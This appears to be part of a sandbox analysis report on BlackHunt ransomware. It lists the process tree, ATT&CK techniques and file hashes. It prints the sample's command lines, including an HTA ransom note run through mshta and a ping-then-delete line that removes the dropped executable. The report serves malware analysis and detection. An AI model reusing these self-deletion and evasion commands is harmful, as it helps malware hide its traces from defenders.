C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:13708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:10432 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:7412
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 14524⤵
- Program crash
PID:12384
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\ceecf4ad5807ab301b32f2a6a438f00638339ddd103d1d4d8772a19a4c8022b4.exe"2⤵PID:10568
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:13172
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:6544
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:12676
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6648
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:7984
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 7412 -ip 74121⤵PID:12828
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD509765675d1664f0562c89399b99e6ec0
SHA1809eb26ac64b3a8c311c4b83d06b253f70f3d45b
SHA2560b2c7cf1b91cca075bbebdb440f29ed94dc7dc42f78d54e7906be08c382e4230
SHA51243b94e4b6b98e86737e206c944023c5c019eb4404d0a9b737a251644f3ac731d34b5a908214a10b64a8131bd45b66354a6a9d54c02995da1153a526a7a92bb74
-
Filesize
12KB
MD5d7face612e128fbf5fe4e5ff85006753
SHA1402448cee536d78b56d20cad279310d2aab17ba0
SHA2567c4550dfd743230ab2406d70a0dd1aa83c49cf3464e3061fc26a0acd98a7908e
SHA512429823aa5dca3c186b031dc44b20192b8810e0e71fe28b5b60cdc8af9c8ab77e8e5d74f5756e7ceb9a0efe0a23c072f1eee483d4179e438fdebb1e9b98c3575f
-
Filesize
684B
MD50f9452897fc435e0cea72c8d5ecf73c5
SHA1161e146bf8ec54057a3fd473c2918fa35f657ff2
SHA256cc5279e1eae4edbb69d29f689e0ba7dcd214cc0f793209e0fd2bfab0420ac99c
SHA512525eef85f8839eaaa48b79cd892ac1126b9590c17afe9cb80cf846341ca0b4087f6b599d87027ef256ed5574cdb603a08e4016e607cb8b0675e81ead6faa88da